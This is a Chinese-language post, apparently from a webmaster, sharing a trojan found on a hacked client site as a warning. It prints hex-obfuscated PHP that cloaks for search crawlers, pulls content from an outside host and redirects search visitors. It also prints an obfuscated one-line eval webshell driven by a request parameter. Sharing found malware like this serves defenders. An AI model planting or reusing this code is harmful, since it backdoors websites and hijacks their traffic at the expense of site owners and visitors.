刚遇到一个客户网站被挂马劫持了,在偶丰富的经验下,大马们很快就缴械投降了,唯独一个小马隐藏的很深,查了两天才查到,现在分享出来给大家交流,一定要小心,现在的黑客都是为了利益TM不干人事的人精呀!!
被挂马现像,调试以及清马过程切图如下:
木马内容如下:
- 调用
- //@INCLUDE_ONCE(PACK('H*','453a2f52454359434c45522f6e67696e78'));
- 劫持
-
- date_default_timezone_set('PRC');
- $start_link=false;
- function Class_UC_key($string){$array = strlen ($string);$debuger = '';for($one = 0;$one < $array;$one+=2) {$debuger .= pack ("C",hexdec (substr ($string,$one,2)));}return $debuger;}
- function Class_Get($url){if(extension_loaded('curl')){$ch = curl_init(trim($url));curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$content = curl_exec($ch);curl_close($ch);}else{$content = @file_get_contents(trim($url));}return $content;}
- function Class_Turl($url,$host){
- $string = Class_UC_key('4c6f636174696f6e3a20').$url.Class_UC_key('3f').$host;
- Header($string);
- exit;
- }
- function getIP(){
- if (@$_SERVER["HTTP_X_FORWARDED_FOR"])$ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
- else if (@$_SERVER["HTTP_CLIENT_IP"])$ip = $_SERVER["HTTP_CLIENT_IP"];
- else if (@$_SERVER["REMOTE_ADDR"])$ip = $_SERVER["REMOTE_ADDR"];
- else if (@getenv("HTTP_X_FORWARDED_FOR"))$ip = getenv("HTTP_X_FORWARDED_FOR");
- else if (@getenv("HTTP_CLIENT_IP"))$ip = getenv("HTTP_CLIENT_IP");
- else if (@getenv("REMOTE_ADDR"))$ip = getenv("REMOTE_ADDR");
- else $ip = "Unknown";
- return $ip;
- }
- error_reporting(E_ERROR);
- define('HOST',$_SERVER['HTTP_HOST']);
- define('REFE',$_SERVER['HTTP_REFERER']);
- define('USER',$_SERVER['HTTP_USER_AGENT']);
- define('URL',$_SERVER['REQUEST_URI']);
- define('URL1',$_SERVER['PHP_SELF']);
- $retueby = array(
- 1 => Class_UC_key ('636f6e74656e742d547970653a20746578742f68746d6c3b20636861727365743d676232333132'),
- 2 => Class_UC_key ('687474703a2f2f'),
- );
- define('BOSWON',Class_UC_key ('62616964757c676f6f676c657c736f676f757c736f736f'));
- define('CLASS_ZHU',$retueby[2].Class_UC_key('7868662e66656e673030372e636f6d3a3636362f79756578692f696e6465782e706870'));
- define('GAME','xhf');
- define('MO','yuexi');
- define('DAO','dao_a');
- $sid=$_GET['id'];
- $myget = false;
- if(strlen(URL)>=2 &&stristr(URL,'arcid')){
- $myget = true;
- if(stripos(REFE,'baidu')>-1 || stripos(REFE,'360')>-1 || stripos(REFE,'soso')>-1 || stripos(REFE,'google')>-1)
- {
- $url = '';
- echo $url;
- }
- }
- if (eregi (BOSWON,USER) || $start_link==true){
-
- if(!empty($_GET) && $myget){
- echo Class_Get(CLASS_ZHU.'?allgame='.GAME.'&url='.bin2hex(URL).'&url1='.bin2hex(URL1).'&mo='.MO.'&dao='.DAO.'&host='.HOST.'&sid='.$sid);
- echo $dao;
- exit;
- }
- if(empty($_GET)){
- echo '';
- }
- }
- if(eregi (BOSWON,REFE)){
- foreach($arrgpe as $strss => $idss){
- if(stristr(REFE,$strss)){
- $myids = $idss;
- }
- }
- $class_n = true;
- if(stristr(REFE,'site%3A') or stristr(REFE,'inurl%3A')){
- setcookie('x86',HOSTT,time() + 259200);
- $class_n = false;
- }
- if(('http://'.HOSTT.URLL !== 'http://'.HOSTT.'/') && ('http://'.HOSTT.URLL !== 'http://'.HOSTT.'/index.php') && $class_n && empty($_COOKIE['x86']) && !empty($myids)){
- setcookie('x86',HOSTT,time() + 259200);
- $Class_change = trim(Class_Get(CLASS_URL));
- $Class_arrs = explode('@@@',$Class_change);
- $Class_news = base64_decode($Class_arrs[1]);
- $Class_come = $Class_news.$myids.Class_UC_keyy('2e68746d');
- Class_Turl($Class_come,HOSTT);
- }
- }
- ?>
- 一句话
-
- $dc = array('v', 'a', ")", "(", "$", ',', "'", ';', '_', "f", 'e', 'c', 's', 't', 'p', 'o', 'u', 'l', 'i', 'n', 'k');
- $fuc = create_function('$k',$dc[10].$dc[0].$dc[1].$dc[17].$dc[3].$dc[4].$dc[20].$dc[2].$dc[7]);
- $fuc($_REQUEST[5202]);
- ?>
|
